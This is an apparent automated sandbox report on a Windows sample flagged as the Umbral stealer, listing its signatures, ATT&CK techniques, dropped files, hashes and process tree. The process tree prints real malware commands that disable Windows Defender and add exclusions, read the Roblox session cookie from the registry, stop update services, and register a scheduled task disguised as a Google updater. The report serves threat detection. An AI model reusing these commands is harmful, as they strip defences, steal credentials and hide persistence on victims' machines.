umbral | a13dd805f2700173d410809954b9d98ae3586c0c65c20270a378887d83b738b0

Analysis

max time kernel
7s
max time network
14s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
06-12-2024 11:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

launcher.exe
Size

40.0MB
MD5

bad6b4ffa6b16bbd802f3f4f887760b2
SHA1

d45d0a086cf87cf14aa129a9b34d5c9f80ab6ae2
SHA256

a13dd805f2700173d410809954b9d98ae3586c0c65c20270a378887d83b738b0
SHA512

fc0398c9ab294dc3f379e1129fbb20e35fcbae728a1619aa3c1f316541dbbb717d9662feca11dd2e1f45c814b2debb9468b99830c8ea33ebff47bc474a87cd1c
SSDEEP

786432:IDOEGyqaCfzdbbTBYlx6Tstl7wi48Yi/xOMx75Ss5VR4L50IhbURTq3:ID7glBYyYtxw58rxOMFXRRIhbU1O

Score

10^/10

umbral evasion execution persistence stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x002a000000045073-73.dat	family_umbral
behavioral1/memory/2504-83-0x0000022A758B0000-0x0000022A758F0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5052	powershell.exe
1940	powershell.exe
2200	powershell.exe
1212	powershell.exe
4424	powershell.exe
2364	powershell.exe
2876	powershell.exe
4028	powershell.exe
3056	powershell.exe
548	powershell.exe
4572	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	launcher.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe	launcher.exe

Executes dropped EXE 3 IoCs

pid	Process
240	cs2.exe
4476	kaban.exe
2504	Stealer.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cs2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\cs2.exe"	launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kaban = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kaban.exe"	launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stealer = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Stealer.exe"	launcher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Power Settings 1 TTPs 5 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4704	powercfg.exe
5052	cmd.exe
4504	powercfg.exe
3452	powercfg.exe
4984	powercfg.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
116	sc.exe
1552	sc.exe
3008	sc.exe
3744	sc.exe
5076	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1020	wmic.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2876	powershell.exe
2876	powershell.exe
5052	powershell.exe
5052	powershell.exe
1940	powershell.exe
1940	powershell.exe
2200	powershell.exe
2200	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeIncreaseQuotaPrivilege	2876	powershell.exe
Token: SeSecurityPrivilege	2876	powershell.exe
Token: SeTakeOwnershipPrivilege	2876	powershell.exe
Token: SeLoadDriverPrivilege	2876	powershell.exe
Token: SeSystemProfilePrivilege	2876	powershell.exe
Token: SeSystemtimePrivilege	2876	powershell.exe
Token: SeProfSingleProcessPrivilege	2876	powershell.exe
Token: SeIncBasePriorityPrivilege	2876	powershell.exe
Token: SeCreatePagefilePrivilege	2876	powershell.exe
Token: SeBackupPrivilege	2876	powershell.exe
Token: SeRestorePrivilege	2876	powershell.exe
Token: SeShutdownPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeSystemEnvironmentPrivilege	2876	powershell.exe
Token: SeRemoteShutdownPrivilege	2876	powershell.exe
Token: SeUndockPrivilege	2876	powershell.exe
Token: SeManageVolumePrivilege	2876	powershell.exe
Token: 33	2876	powershell.exe
Token: 34	2876	powershell.exe
Token: 35	2876	powershell.exe
Token: 36	2876	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeIncreaseQuotaPrivilege	5052	powershell.exe
Token: SeSecurityPrivilege	5052	powershell.exe
Token: SeTakeOwnershipPrivilege	5052	powershell.exe
Token: SeLoadDriverPrivilege	5052	powershell.exe
Token: SeSystemProfilePrivilege	5052	powershell.exe
Token: SeSystemtimePrivilege	5052	powershell.exe
Token: SeProfSingleProcessPrivilege	5052	powershell.exe
Token: SeIncBasePriorityPrivilege	5052	powershell.exe
Token: SeCreatePagefilePrivilege	5052	powershell.exe
Token: SeBackupPrivilege	5052	powershell.exe
Token: SeRestorePrivilege	5052	powershell.exe
Token: SeShutdownPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeSystemEnvironmentPrivilege	5052	powershell.exe
Token: SeRemoteShutdownPrivilege	5052	powershell.exe
Token: SeUndockPrivilege	5052	powershell.exe
Token: SeManageVolumePrivilege	5052	powershell.exe
Token: 33	5052	powershell.exe
Token: 34	5052	powershell.exe
Token: 35	5052	powershell.exe
Token: 36	5052	powershell.exe
Token: SeDebugPrivilege	4476	kaban.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeIncreaseQuotaPrivilege	1940	powershell.exe
Token: SeSecurityPrivilege	1940	powershell.exe
Token: SeTakeOwnershipPrivilege	1940	powershell.exe
Token: SeLoadDriverPrivilege	1940	powershell.exe
Token: SeSystemProfilePrivilege	1940	powershell.exe
Token: SeSystemtimePrivilege	1940	powershell.exe
Token: SeProfSingleProcessPrivilege	1940	powershell.exe
Token: SeIncBasePriorityPrivilege	1940	powershell.exe
Token: SeCreatePagefilePrivilege	1940	powershell.exe
Token: SeBackupPrivilege	1940	powershell.exe
Token: SeRestorePrivilege	1940	powershell.exe
Token: SeShutdownPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeSystemEnvironmentPrivilege	1940	powershell.exe
Token: SeRemoteShutdownPrivilege	1940	powershell.exe
Token: SeUndockPrivilege	1940	powershell.exe
Token: SeManageVolumePrivilege	1940	powershell.exe
Token: 33	1940	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 2876	2556	launcher.exe	80
PID 2556 wrote to memory of 2876	2556	launcher.exe	80
PID 2556 wrote to memory of 240	2556	launcher.exe	87
PID 2556 wrote to memory of 240	2556	launcher.exe	87
PID 2556 wrote to memory of 5052	2556	launcher.exe	88
PID 2556 wrote to memory of 5052	2556	launcher.exe	88
PID 2556 wrote to memory of 4476	2556	launcher.exe	90
PID 2556 wrote to memory of 4476	2556	launcher.exe	90
PID 2556 wrote to memory of 1940	2556	launcher.exe	91
PID 2556 wrote to memory of 1940	2556	launcher.exe	91
PID 2556 wrote to memory of 2504	2556	launcher.exe	93
PID 2556 wrote to memory of 2504	2556	launcher.exe	93
PID 2556 wrote to memory of 2200	2556	launcher.exe	94
PID 2556 wrote to memory of 2200	2556	launcher.exe	94

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cs2.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Users\Admin\AppData\Local\Temp\cs2.exe
  "C:\Users\Admin\AppData\Local\Temp\cs2.exe"
  2⤵
  - Executes dropped EXE
  PID:240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kaban.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5052
- C:\Users\Admin\AppData\Local\Temp\kaban.exe
  "C:\Users\Admin\AppData\Local\Temp\kaban.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1940
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe"
  2⤵
  - Executes dropped EXE
  PID:2504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:1704
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:4168
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:556
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4572
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Client.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2200
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  PID:1492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
- Command and Scripting Interpreter: PowerShell
PID:4424

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:860
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:116
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1552
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3008
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:3744
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5076

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
- Power Settings
PID:5052
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:4504
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3452
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4984
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cxqteetr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:548

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:2620

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
"C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe"
1⤵
PID:2408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a8b49ac74fc72576ad0ffc1eaa981ea5

SHA1
fd1a7b88aedc63577ddbf854bb96d58482d70559

SHA256
1b7baa2ee7472f821db1e869f6fc516c4b49917876233e582e00bf056a3bd712

SHA512
3535763c685fc6f60a607da4f1a3b314834d8f1d63619363de71b744abb3ae5b1e1ab63914b0ba04d079dd237512d9854e12d0ab2bfcf4830cc165ec9672c6d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8655e82b7837778e907fc8a37fdaabd8

SHA1
8747d03a2876d07a6c2152d1a8f6885e7ddf1b6f

SHA256
99a90c4670ece3b5a39662faafc011b1677718e798aaface87cf37cddcfc69b4

SHA512
0437422db6fb882e8873a8bb3d4810e4057773f460c54a771c685252585d439fd29488f37aca39202e7513a6456367595e5dbb60deeb3e4dfb5a0cbf80e83550

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
62f8fbde65a185c33212ca7af47d090a

SHA1
01c207b3e8bf2dbdcd5962623b756f1808428e8e

SHA256
1b1746722a174074f5cdee7d3e0b020d1e9a76a331499eebdcc1c1dbaf161346

SHA512
78d6417c573e7f178abf6806c2f3041d6ff8dcced68d84c734abe51feccb611252ff7381267d30d240b6c07675893ca7e9eae01a506fd1df37e480a90ab45438

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0cf9a5da752d624b6f9d6ca53638d085

SHA1
b4c48a3edda5de65f7a302a83c03880636871fc3

SHA256
a2bea53f5a893a354be98585b3555bac12ee72f467fe171c2ae89857d7908b37

SHA512
4c52f6aed4b0a5c65096e173c3f5612f7e7fdedb4e1993cce056547793ae991830b3b6c339406c222e5b7e3c27d6e84b8d65e10638a0d3c2b338bc44e08f2a66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
66e05db30979523af33a61719f3241c3

SHA1
a145a5b620fe8fa6e7469fff121384cb927115ac

SHA256
693c38b10f51353c84fc872275025ae4014eefb1de14b37688dcb59e77526224

SHA512
4cb9b455bffc1ee628550a1289ea0cd09989cece291a225befde8986980566f681ba16449d774111b273a373abfdeca1700dcb8854af0efeed31887f38c26db1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0f59cccd39a3694e0e6dfd44d0fa76d

SHA1
fccd7911d463041e1168431df8823e4c4ea387c1

SHA256
70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

SHA512
5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8ddadbef2d41f14c788825155943c17

SHA1
21d6b91d7f58681d7190dc15eeb6bcc363c6f301

SHA256
f17cc0d7706fdb3d47d661ca3448b9aff06feadec850c9a261bd5c82f63825fb

SHA512
1abd39aeb76f54dc4b6044da62e0c3e99ac396d1eebb51d99cedbdc0e477af26233394d9a82c0cf4d678bb42204e607abbb1bc0b0e08a69dd071a3ee331401b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
edee1830bc7084c6d0ebf61bc268dbbd

SHA1
b5c6062cb108bf35f894dc304683052501e39ab9

SHA256
fc11fabec8268cef1c52f0db67f23390bcf7c96c31376f2a93a7b104dd932f74

SHA512
fc2ffa4f45bd2e06568db25641411ed1ccae10b1e88f9a8cc631a187f8b215e0ef48eda9a2f5dbffba5c5f1fe7a290c1694542f5b297b43e82595e21daed3963

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
311KB

MD5
d2be8b5ab71e40b09b0d87c299350451

SHA1
187249ff0e080ff91ab16022d82e7c044b9638b2

SHA256
97559acaa4dfaa8d88225ade15e76c90d5e857f130aaabc44d60c6ede2afe959

SHA512
ed6465a9bf54432deafa80440be18b4a0e5b091c5c79719cc952fb9501b66e746b1024c6f4795b9e72181e29cac882c0c9eaf6b54875d533eae2274edb7d1c4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wllnha0w.1iw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kaban.exe

Filesize
549KB

MD5
f6feba04f41fba12a5e9f3e610f05ba0

SHA1
fff10a0adf752e7bec16d69ab3d1911a1ea7ffae

SHA256
e116555c068fdfdda264b5ade3846ba4239ff86d82084c88909b3e8509e14ebe

SHA512
11a6f55699cb374ec6c6e8f4442066d7317d9583eeff4555d27472b713015e3e0d26bc6df3f2dd192c10db22377ec3421912c70b20bd8bc509e7df4f31ca9924

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe

Filesize
230KB

MD5
75d1a51d608f2812db4dfb3e00616b4d

SHA1
5ee4157f474de2525afc8f772cb30407bee89998

SHA256
75503a09abbbddd4921e140bc4c9e50bcda02c67f6a078d62aa387c6421c8295

SHA512
a7dd8e26152b7310e745a98f059ecf4115092e4f290f8574fe54df7ded47b7aced7feab72d5a67faadc50a89f7789b477d27447031186cc34701391de9ed9bda

Download Submit
memory/240-191-0x00007FF6DC8D0000-0x00007FF6E0594000-memory.dmp

Filesize
60.8MB

Download
memory/1492-110-0x0000000000450000-0x00000000004A4000-memory.dmp

Filesize
336KB

Download
memory/2504-146-0x0000022A78030000-0x0000022A780A6000-memory.dmp

Filesize
472KB

Download
memory/2504-183-0x0000022A77F60000-0x0000022A77F6A000-memory.dmp

Filesize
40KB

Download
memory/2504-83-0x0000022A758B0000-0x0000022A758F0000-memory.dmp

Filesize
256KB

Download
memory/2504-185-0x0000022A78000000-0x0000022A78012000-memory.dmp

Filesize
72KB

Download
memory/2504-148-0x0000022A77F70000-0x0000022A77F8E000-memory.dmp

Filesize
120KB

Download
memory/2504-147-0x0000022A77F90000-0x0000022A77FE0000-memory.dmp

Filesize
320KB

Download
memory/2556-0-0x00007FFF848C3000-0x00007FFF848C5000-memory.dmp

Filesize
8KB

Download
memory/2556-1-0x0000000000160000-0x000000000296E000-memory.dmp

Filesize
40.1MB

Download
memory/2556-111-0x00007FFF848C0000-0x00007FFF85382000-memory.dmp

Filesize
10.8MB

Download
memory/2556-20-0x00007FFF848C0000-0x00007FFF85382000-memory.dmp

Filesize
10.8MB

Download
memory/2876-13-0x00007FFF848C0000-0x00007FFF85382000-memory.dmp

Filesize
10.8MB

Download
memory/2876-12-0x00007FFF848C0000-0x00007FFF85382000-memory.dmp

Filesize
10.8MB

Download
memory/2876-14-0x00007FFF848C0000-0x00007FFF85382000-memory.dmp

Filesize
10.8MB

Download
memory/2876-11-0x000001ED73660000-0x000001ED73682000-memory.dmp

Filesize
136KB

Download
memory/2876-15-0x00007FFF848C0000-0x00007FFF85382000-memory.dmp

Filesize
10.8MB

Download
memory/2876-16-0x00007FFF848C0000-0x00007FFF85382000-memory.dmp

Filesize
10.8MB

Download
memory/2876-19-0x00007FFF848C0000-0x00007FFF85382000-memory.dmp

Filesize
10.8MB

Download
memory/4476-57-0x0000000000260000-0x00000000002F0000-memory.dmp

Filesize
576KB

Download